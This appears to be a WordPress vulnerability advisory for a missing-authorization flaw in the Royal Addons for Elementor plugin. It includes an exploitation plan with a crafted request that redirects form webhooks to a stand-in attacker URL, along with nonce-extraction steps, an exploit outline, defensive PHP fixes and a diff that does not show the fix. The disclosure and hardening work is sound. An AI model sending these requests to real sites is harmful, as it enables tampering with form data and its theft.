CVE-2026-4024

Royal Addons for Elementor <= 1.7.1056 - Missing Authorization to Unauthenticated Form Action Meta Modification

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: 1.7.1057
Time to patch: 1d

Description

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. Although a nonce is verified, the nonce (`wpr-addons-js`) is publicly exposed in frontend JavaScript via `WprConfig.nonce` on any page that loads Royal Addons widgets, rendering the protection ineffective. The endpoint also lacks any capability or ownership checks and directly calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys. This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp, and webhook settings) on any post, potentially leading to webhook/email action tampering and data exfiltration via modified webhook URLs.
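The pattern the description calls out (a nonce check present, a capability check absent, and the handler reachable through `wp_ajax_nopriv`) next to the shape of a correctly authorized handler, as an added illustration that is neither the plugin's code nor the vendor's fix. The hook name and nonce action are the ones named in the advisory; the function name, the whitelist of meta keys and the per-key sanitizers are assumptions made for the example.

```php
<?php
// Added illustration, not the plugin's code: a hardened version of the kind of
// AJAX handler the advisory describes. Function name and meta keys are assumed.
// A nonce is a CSRF token, not authorization: it is printed into public JS, so
// anyone can read it. Authorization has to come from current_user_can().

// Meta keys the handler may touch, and the sanitizer applied to each value.
// Assumed names for illustration; the plugin's real whitelist is not on this page.
const WPR_EXAMPLE_ALLOWED_META = array(
    'wpr_form_email_to'    => 'sanitize_email',
    'wpr_form_webhook_url' => 'esc_url_raw',
    'wpr_form_submissions' => 'sanitize_text_field',
);

function wpr_example_update_form_action_meta() {
    // 1. CSRF check only. Passing this proves nothing about who the caller is.
    check_ajax_referer( 'wpr-addons-js', 'nonce' );

    // 2. Validate that the target post exists before doing anything with it.
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    if ( ! $post_id || ! get_post( $post_id ) ) {
        wp_send_json_error( 'invalid post', 400 );
    }

    // 3. Authorization: the check the vulnerable version lacks. 'edit_post' is a
    // meta capability resolved per post, so ownership and role are both honoured.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Restrict the key to the whitelist and sanitize the value for that key.
    $meta_key = isset( $_POST['meta_key'] ) ? sanitize_key( wp_unslash( $_POST['meta_key'] ) ) : '';
    if ( ! array_key_exists( $meta_key, WPR_EXAMPLE_ALLOWED_META ) ) {
        wp_send_json_error( 'meta key not allowed', 400 );
    }
    $sanitizer  = WPR_EXAMPLE_ALLOWED_META[ $meta_key ];
    $meta_value = isset( $_POST['meta_value'] ) ? wp_unslash( $_POST['meta_value'] ) : '';
    $meta_value = call_user_func( $sanitizer, $meta_value );

    update_post_meta( $post_id, $meta_key, $meta_value );
    wp_send_json_success();
}

// 5. Register for logged-in users only. With no wp_ajax_nopriv_ hook, admin-ajax.php
// answers anonymous requests with its default "0" response before any handler runs.
add_action( 'wp_ajax_wpr_update_form_action_meta', 'wpr_example_update_form_action_meta' );
```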

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.7.1056
Published: May 1, 2026
Last updated: May 2, 2026
Affected plugin: royal-elementor-addons

What Changed in the Fix

Changes introduced in v1.7.1057


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan - CVE-2026-4024

1. Vulnerability Summary

The Royal Addons for Elementor plugin (up to version 1.7.1056) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function wpr_update_form_action_meta is registered to both wp_ajax and wp_ajax_nopriv hooks, making it accessible to unauthenticated users. The function allows the modification of post metadata without verifying whether the requesting user has the authority to edit the post or its settings. While it performs a nonce check (wpr-addons-js), this nonce is leaked on the frontend via the WprConfig.nonce JavaScript variable, rendering the protection ineffective.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: wpr_update_form_action_meta
  • HTTP Method: POST
  • Authentication: Unauthenticated
  • Required Parameters:
    • action: wpr_update_form_action_meta
    • nonce: The value of wpr-addons-js (found in WprConfig.nonce)
    • post_id: The ID of the post/page to modify.
    • meta_key: A whitelisted meta key (e.g., wpr_form_webhook_url, wpr_form_email_to) (inferred from description).
    • meta_value: The new value for the meta key (e.g., an attacker-controlled webhook URL).

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=wpr_update_form_action_meta.
  2. Hook Execution: WordPress triggers the handler registered to wp_ajax_nopriv_wpr_update_form_action_meta.
  3. Nonce Verification: The handler calls check_ajax_referer('wpr-addons-js', 'nonce') (inferred). Since the attacker provides the leaked nonce from the frontend, this check passes.
  4. Authorization Check: The handler lacks any call to current_user_can() or ownership checks.
  5. Data Update: The handler retrieves post_id, meta_key, and meta_value from the $_POST array.
  6. Sink: The handler calls update_post_meta($post_id, $meta_key, $meta_value) after verifying the meta_key against a whitelist of form settings.
  7. Result: Metadata associated with a Royal Addons form (like its webhook destination) is modified.

4. Nonce Acquisition Strategy

The nonce is localized for the plugin's frontend scripts. To obtain it:

  1. Identify Script Loading: The plugin enqueues WprConfig on pages that use Royal Addons widgets (like the Form Builder).
  2. Create Trigger Content: Use WP-CLI to create a page containing a Royal Addons form shortcode or widget.
  3. Navigate and Extract:
    • Use browser_navigate to visit the created page.
    • Use browser_eval to extract the nonce from the global WprConfig object.

Extraction JS:

window.WprConfig?.nonce

5. Exploitation Strategy

Step 1: Discover/Create Target

Find an existing post ID or create a dummy page to prove the ability to modify meta.

Step 2: Get the Nonce

Navigate to any frontend page where the plugin is active and extract WprConfig.nonce.

Step 3: Modify Form Settings

Send a crafted AJAX request to redirect form submissions to an external listener.

Request Details:

  • URL: http://<target-site>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
action=wpr_update_form_action_meta&nonce=[EXTRACTED_NONCE]&post_id=[TARGET_ID]&meta_key=wpr_form_webhook_url&meta_value=https://attacker-collector.com/leak

(Note: Based on the description, wpr_form_webhook_url is a likely whitelisted key for the Form Action modification).

6. Test Data Setup

  1. Install Plugin: Ensure royal-elementor-addons v1.7.1056 is active.
  2. Create Target Page:
    wp post create --post_type=page --post_title="Royal Form Page" --post_status=publish --post_content='[wpr-form-builder]'
  3. Note the ID: Capture the ID of the created post (e.g., 123).

7. Expected Results

  • The AJAX request should return a successful response (likely JSON {"success": true} or a string 1).
  • The post meta for the target ID will be updated in the database.

8. Verification Steps

After performing the exploit, verify the database state using WP-CLI:

wp post meta get [TARGET_ID] wpr_form_webhook_url

Success Condition: The command returns https://attacker-collector.com/leak.

9. Alternative Approaches

If wpr_form_webhook_url is not the exact key name, the following keys (whitelisted for form actions) should be tried:

  • wpr_form_email_to (Modify where notification emails are sent)
  • wpr_form_mailchimp_api_key (Modify Mailchimp integration)
  • _wpr_form_webhook_url (Check for underscored prefix)

If the WprConfig object is not found on the homepage, check if it's nested under another object or examine the page source for:
wp_localize_script( ..., 'WprConfig', ... )
to confirm the localization handle.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpr_update_form_action_meta' AJAX action. An unauthenticated attacker can modify form configuration metadata—such as webhook URLs and email recipients—by exploiting a publicly exposed nonce, potentially leading to the exfiltration of sensitive form submission data.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php
--- /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1056/admin/plugin-options.php	2026-04-03 11:57:32.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/royal-elementor-addons/1.7.1057/admin/plugin-options.php	2026-04-10 10:58:42.000000000 +0000
@@ -120,6 +120,8 @@
     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');
     register_setting('wpr-extension-settings', 'wpr-custom-css');
     register_setting('wpr-extension-settings', 'wpr-display-conditions');
+    register_setting('wpr-extension-settings', 'wpr-equal-height');
+    // register_setting('wpr-extension-settings', 'wpr-column-slider');
     register_setting('wpr-extension-settings', 'wpr-sticky-section');
 
     // Element Toggle
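Review bot: this hunk only registers the new 'wpr-equal-height' extension setting and leaves a commented-out `register_setting('wpr-extension-settings', 'wpr-column-slider');` line behind; nothing in it touches the `wpr_update_form_action_meta` handler, its `wp_ajax_nopriv` registration or a `current_user_can()` check, so the authorization fix the advisory credits to 1.7.1057 must live in a part of the diff that is truncated here and should be confirmed from the full changeset. Commented-out registrations should be deleted rather than shipped, or kept with a one-line comment saying why the option is parked.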
@@ -1630,6 +1632,12 @@
                         echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
                     } elseif ( 'wpr-display-conditions' === $option_name ) {
                         echo '<br><span>Tip: Edit any Element > Navigate to Visibility tab</span>';
+                    } elseif ( 'wpr-column-slider' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
+                    } elseif ( 'wpr-equal-height' === $option_name ) {
+                        echo '<br><span>Tip: Edit any Section > Navigate to Advanced tab</span>';
+                        // echo '<a href="https://www.youtube.com" target="_blank">Watch Video Tutorial</a>';
                     }
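Review bot: the new `'wpr-column-slider' === $option_name` branch adds an admin tip for an option whose `register_setting()` call is commented out in the first hunk, so the two hunks disagree about whether that extension exists; either register it or drop the branch. Both new `elseif` branches echo the identical `Tip: Edit any Section > Navigate to Advanced tab` string and each carries a commented-out placeholder `<a href="https://www.youtube.com" target="_blank">` link that should be removed or replaced before release; the three identical branches could be collapsed into one `in_array( $option_name, array( ... ), true )` test. As in the first hunk, nothing visible here changes the AJAX handler's authorization.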
 ... (truncated)

Exploit Outline

  1. Nonce Retrieval: Navigate to any frontend page where Royal Addons widgets are loaded and extract the 'wpr-addons-js' nonce from the global 'WprConfig.nonce' JavaScript variable.
  2. Target Identification: Identify the 'post_id' of a post or page containing a Royal Addons form.
  3. Unauthorized Modification: Send an unauthenticated AJAX POST request to '/wp-admin/admin-ajax.php' with the action 'wpr_update_form_action_meta'.
  4. Payload: Include the extracted nonce, the target 'post_id', a whitelisted 'meta_key' (such as 'wpr_form_webhook_url'), and a malicious 'meta_value' (e.g., an attacker-controlled listener URL).
  5. Verification: Upon success, subsequent form submissions from that post will be directed to the attacker's controlled endpoint, allowing for data interception.
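For sites that cannot move to 1.7.1057 immediately, an added example of a must-use plugin that closes the unauthenticated path by running before the plugin's own callback. This is not the vendor's fix and not part of this page's research output; it assumes the plugin registers its handlers at the default priority 10, and the function names are made up for the example. Each blocked request is written to the PHP error log, which gives a detection signal for the request pattern described above.

```php
<?php
/**
 * Plugin Name: Example virtual patch for CVE-2026-4024
 * Added illustration, not the vendor's fix. Place in wp-content/mu-plugins/ on
 * sites that cannot update yet; remove once 1.7.1057 or later is installed.
 */

// Assumption: the plugin registers its callbacks at the default priority (10).
// A callback at priority 1 fires first; wp_send_json_error() calls wp_die(), so
// the plugin's handler never runs for anonymous requests.
add_action( 'wp_ajax_nopriv_wpr_update_form_action_meta', 'wpr_example_block_nopriv', 1 );
function wpr_example_block_nopriv() {
    // Log the attempt: one line per blocked request for SIEM or log review.
    error_log( sprintf(
        'CVE-2026-4024 virtual patch: blocked unauthenticated wpr_update_form_action_meta post_id=%d src=%s',
        isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0,
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
    ) );
    wp_send_json_error( 'forbidden', 403 );
}

// Logged-in users still reach the plugin's own handler, but only after the
// per-post authorization check the original code lacks.
add_action( 'wp_ajax_wpr_update_form_action_meta', 'wpr_example_require_edit_post', 1 );
function wpr_example_require_edit_post() {
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Fall through: the plugin's callback at priority 10 runs next.
}
```

Removing the nopriv path this way does not need the plugin's callback name, which `remove_action()` would require; it works as long as the plugin's own hook runs at a later priority.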
